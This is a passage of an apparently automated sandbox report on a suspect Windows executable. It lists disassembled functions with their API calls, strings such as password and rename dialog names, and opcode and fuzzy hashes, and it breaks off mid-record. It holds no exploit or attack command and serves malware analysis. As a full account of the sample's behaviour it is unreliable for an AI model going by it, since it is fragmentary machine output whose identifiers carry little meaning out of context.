API String ID: 776569668-831824133
Opcode ID: c41949dc9fcb792d9799014133c2f19ab910928b0b9e65653adfecab009480c9
Instruction ID: 23885e65943a23bd95bfe50bb27faa1c67770621640204de9a2af996d04da63b
Opcode Fuzzy Hash: c41949dc9fcb792d9799014133c2f19ab910928b0b9e65653adfecab009480c9
Instruction Fuzzy Hash: 12F0F4B8A01265CBC7917F19BC054453AA5B716720349C74BF894DAEB0CF3D48A19F8B

Function 006F0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 006F0D0D

Part of subcall function 006EACF5: GetVersionExW.KERNEL32(?), ref: 006EAD1A

LocalFileTimeToFileTime.KERNEL32(?,006F0CB8), ref: 006F0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 006F0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 006F0D56
SystemTimeToFileTime.KERNEL32(?,006F0CB8), ref: 006F0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 006F0D72

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 060ba63f673d8305d63549affc9fd9e65d6515d192d7a7e5a84781aa1b8a7c9c
Instruction ID: 403f28fdce2fc59e021765c1e95a274e70b650daa1fb7061934bfea4c056331c
Opcode Fuzzy Hash: 060ba63f673d8305d63549affc9fd9e65d6515d192d7a7e5a84781aa1b8a7c9c
Instruction Fuzzy Hash: CE310A7990020DEBCB00DFE8C8859EFBBBDFF58700B14845AE955E3211E734A645CB68

Function 006F91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 006F91D4
_memcmp.LIBVCRUNTIME ref: 006F91EB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c2de49b3067346a31f18efc492ca21ab499aa8728e6369bb3bb54695aee65609
Instruction ID: b5d018fd2d8c6fdf0927f7d13649ab285257bf15a2362efa786557f0cdbc350b
Opcode Fuzzy Hash: c2de49b3067346a31f18efc492ca21ab499aa8728e6369bb3bb54695aee65609
Instruction Fuzzy Hash: C621A7B161410EBBD7499F14CC81FBB77AEEF90788B108129FE0997342E274DE4596A1

Function 006FD2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 006FD2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006FD30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006FD31D
TranslateMessage.USER32(?), ref: 006FD327
DispatchMessageW.USER32(?), ref: 006FD331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 006FD33C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 910e1d0beb41fc17333472de0dc420f759f0f883b15542ae6da29216f4efd3c7
Instruction ID: 40febd15ad1b0527f5cd6df361e048b1d8fc0274d57e75f63973264fcb34b8e6
Opcode Fuzzy Hash: 910e1d0beb41fc17333472de0dc420f759f0f883b15542ae6da29216f4efd3c7
Instruction Fuzzy Hash: F8F08C72A0111DBBCB205BA5DC0CEEBBFAEEF52391F40C022F606E2061D6389512C7B1

Function 006FC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 006FC435

Part of subcall function 006F17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,006EBB05,00000000,.exe,?,?,00000800,?,?,006F85DF,?), ref: 006F17C2

Strings

MAX, xrefs: 006FC487
<, xrefs: 006FC41E
MIN, xrefs: 006FC4A3
HIDE, xrefs: 006FC474

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: aebfb723f9d84a1bfa4f9e52d2af833aab1c586182786c7ce4d7061f21e06e82
Instruction ID: 57728ea19900eb465faa0204ab1a8d57f909b89f6952d2cac7e66c3bb371f5c6
Opcode Fuzzy Hash: aebfb723f9d84a1bfa4f9e52d2af833aab1c586182786c7ce4d7061f21e06e82
Instruction Fuzzy Hash: 4131A17390020DAADF25DA94CD51EFE77FEEB54320F004466FB08D6190EBB49EC48A60

Function 006FA990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

EndDialog.USER32(?,00000001), ref: 006FA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 006FA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 006FAA24

Strings

xjs, xrefs: 006FAA02
GETPASSWORD1, xrefs: 006FA9A9

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xjs
API String ID: 445417207-2419388716
Opcode ID: 25c98af92366533fbacef94b9bdcac4598b202a41eebaa24e44485d55e0b4e7a
Instruction ID: 4cc2ad42feb18df417d394af449d79ca8967c3fddf6e05603d705b733aeefcaa
Opcode Fuzzy Hash: 25c98af92366533fbacef94b9bdcac4598b202a41eebaa24e44485d55e0b4e7a
Instruction Fuzzy Hash: F1116B7295011C7ADB219EE59D09FFB3BBEEB0A700F004021FB4DB2191D2B59D56D672

Function 006FADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 006FADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 006FAE22
DeleteObject.GDI32(00000000), ref: 006FAE54
DeleteObject.GDI32(00000000), ref: 006FAE77

Part of subcall function 006F9E1C: FindResourceW.KERNEL32(006FAE4D,PNG,?,?,?,006FAE4D,00000066), ref: 006F9E2E
Part of subcall function 006F9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,006FAE4D,00000066), ref: 006F9E46
Part of subcall function 006F9E1C: LoadResource.KERNEL32(00000000,?,?,?,006FAE4D,00000066), ref: 006F9E59
Part of subcall function 006F9E1C: LockResource.KERNEL32(00000000,?,?,?,006FAE4D,00000066), ref: 006F9E64

Strings

], xrefs: 006FAE2A

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: e336d851b83c0f4d587f6fb7dad236be3489bbaf6d182846d7a02b305e930e4a
Instruction ID: cd2501dbaafa0d89811a284ffb14a8d1b7e2551745d6948978bafb137cd18ab4
Opcode Fuzzy Hash: e336d851b83c0f4d587f6fb7dad236be3489bbaf6d182846d7a02b305e930e4a
Instruction Fuzzy Hash: A3012B7658021DA7C71067A45C05BBF7BBB9F82B41F184115FF04A73A2DB354C2692B5

Function 006FCC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

EndDialog.USER32(?,00000001), ref: 006FCCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 006FCCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 006FCD05
SetDlgItemTextW.USER32(?,00000068), ref: 006FCD14

Strings

RENAMEDLG, xrefs: 006FCCA8

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 3b5b08bcbb6f177e64758ec247b1dd5cc6113bdd8e79221d2189c4b87308908f
Instruction ID: 25cc3fa4b358700016c60ad645ac7d7eeba036c0cafc895b22f073a7c2afc9cf
Opcode Fuzzy Hash: 3b5b08bcbb6f177e64758ec247b1dd5cc6113bdd8e79221d2189c4b87308908f
Instruction Fuzzy Hash: 4E01F5322C421C7AE2214B689E09FBB3B9EAB5A712F108412F345A21E1C7795916C779

Function 00702503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0070251A

Part of subcall function 00702B52: ___AdjustPointer.LIBCMT ref: 00702B9C

_UnwindNestedFrames.LIBCMT ref: 00702531
___FrameUnwindToState.LIBVCRUNTIME ref: 00702543
CallCatchBlock.LIBVCRUNTIME ref: 00702567

Strings

/)p, xrefs: 00702526, 00702517

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /)p
API String ID: 2633735394-3625137688
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 88334bdc0d0c71862534467f5e65a30429f0d6ec22a91cd0a5af9563995b8e41
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: C6016932000108FBCF129F54CC09EDA3BBAEF58310F018154FD18A2161C33AE972EBA4

Function 007075C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00707573,00000000,?,00707513,00000000,0071BAD8,0000000C,0070766A,00000000,00000002), ref: 007075E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007075F5
FreeLibrary.KERNEL32(00000000,?,?,?,00707573,00000000,?,00707513,00000000,0071BAD8,0000000C,0070766A,00000000,00000002), ref: 00707618

Strings

CorExitProcess, xrefs: 007075ED
mscoree.dll, xrefs: 007075DB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 5738eb000e9008ee74280630ebec5a42c71517928fbc30540a9e07efe8e23953
Instruction ID: 012af80a3eaaec76685d13d991fff2ca8aba715637d411624b7638b278f9b0fd
Opcode Fuzzy Hash: 5738eb000e9008ee74280630ebec5a42c71517928fbc30540a9e07efe8e23953
Instruction Fuzzy Hash: 8DF0A470A0450CFBCB159B58DC09BDEBFB9EF04711F008158F805A21D0DB399A40CA98

Function 006EEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 006F0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006F00A0
Part of subcall function 006F0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,006EEB86,Crypt32.dll,00000000,006EEC0A,?,?,006EEBEC,?,?,?), ref: 006F00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 006EEB92
GetProcAddress.KERNEL32(007281C0,CryptUnprotectMemory), ref: 006EEBA2

Strings

CryptUnprotectMemory, xrefs: 006EEB98
CryptProtectMemory, xrefs: 006EEB8C
Crypt32.dll, xrefs: 006EEB7C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: dee4d49975a34170a91d61c6d63d9158a513782d14f779a2bdc7d6af093fafed
Instruction ID: d62045969c14f798f3f4ef4b7a5e7320837ffe0d80c164a90a4bbe86164d226c
Opcode Fuzzy Hash: dee4d49975a34170a91d61c6d63d9158a513782d14f779a2bdc7d6af093fafed
Instruction Fuzzy Hash: 10E04FB08457819EDF209F3D9809BC2BEE59B18714B00C85DE4DAE32C0DAB9E5808B50

Function 00707DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00707E4B
_free.LIBCMT ref: 00707E6B

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5faa368b9add931213378742ffdf79d3e2148b096269a18e03b3e594d689dc7e
Instruction ID: 079ee145cbcf986850d2436e4b20b497de1083b97813cbeb5859c5efdd9871f0
Opcode Fuzzy Hash: 5faa368b9add931213378742ffdf79d3e2148b096269a18e03b3e594d689dc7e
Instruction Fuzzy Hash: 2141C132E01304DFCB14DF78C881A5EB7E6EF88714B5586A9E915EB381DB35AD01CB80

Function 0070B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0070B619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070B63C

Part of subcall function 00708518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0070C13D,00000000,?,007067E2,?,00000008,?,007089AD,?,?,?), ref: 0070854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070B662
_free.LIBCMT ref: 0070B675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070B684

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 5230a9e74458c25ec643abd7d0858994a54293b523b66c29c722d631a2972c22
Instruction ID: 95b88f359d1b784b4fd77df5faa13fa10bdbd925e8fcb99d2603db02532a0f11
Opcode Fuzzy Hash: 5230a9e74458c25ec643abd7d0858994a54293b523b66c29c722d631a2972c22
Instruction Fuzzy Hash: A3018872601615FFA72156BA5C4CCBB69ADDEC6BA03154329BD04C7190DF698E0191B4

Function 006F075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 006F0A41: ResetEvent.KERNEL32(?), ref: 006F0A53
Part of subcall function 006F0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006F0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 006F078F
CloseHandle.KERNEL32(?,?), ref: 006F07A9
DeleteCriticalSection.KERNEL32(?), ref: 006F07C2
CloseHandle.KERNEL32(?), ref: 006F07CE
CloseHandle.KERNEL32(?), ref: 006F07DA

Part of subcall function 006F084E: WaitForSingleObject.KERNEL32(?,000000FF,006F0A78,?), ref: 006F0854
Part of subcall function 006F084E: GetLastError.KERNEL32(?), ref: 006F0860

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 4bccaa78e819463aaedd3a0927a4952dcaf4d94c78a15281a7aa884d41d6e59e
Instruction ID: 5c7a06531f4b8530db262858228c6e1f3e35ce51b7be5afe3cf2a21a070cf29e
Opcode Fuzzy Hash: 4bccaa78e819463aaedd3a0927a4952dcaf4d94c78a15281a7aa884d41d6e59e
Instruction Fuzzy Hash: 4E01B571440708EFC7229B69DC84FD6BBEFFB48710F008569F25A521A1CB79BA44CB94

Function 0070BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0070BF28

Part of subcall function 007084DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958), ref: 007084F4
Part of subcall function 007084DE: GetLastError.KERNEL32(00713958,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958,00713958), ref: 00708506

_free.LIBCMT ref: 0070BF3A
_free.LIBCMT ref: 0070BF4C
_free.LIBCMT ref: 0070BF5E
_free.LIBCMT ref: 0070BF70

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6b8f9fc3106aef18f1013ae3beacd29986afc736ded1d0bcd08e447fddd76c1e
Instruction ID: 29527ad0217d41181ac40fa05be1c6ebf779b5765fc54fdb1647d474bf74263b
Opcode Fuzzy Hash: 6b8f9fc3106aef18f1013ae3beacd29986afc736ded1d0bcd08e447fddd76c1e
Instruction Fuzzy Hash: C2F0FF32604642E7C6A0EF68FE8AD5673E9BA04710764CA09F488DB9D0CB2CFD808A55

Function 007076BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LisectAVT_2403002A_442.exe,00000104), ref: 007076FD
_free.LIBCMT ref: 007077C8
_free.LIBCMT ref: 007077D2

Strings

C:\Users\user\Desktop\LisectAVT_2403002A_442.exe, xrefs: 007076F4, 007076FB, 0070772A, 00707762

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe
API String ID: 2506810119-2963290690
Opcode ID: b427dafd1acb379182f38fa8176ccd6434b75c2a14c11954dee0b798d33d5e22
Instruction ID: 8189603c08ad23a0a593a79faed009e3affee7c8fff0b593fbc0fc674434ddb3
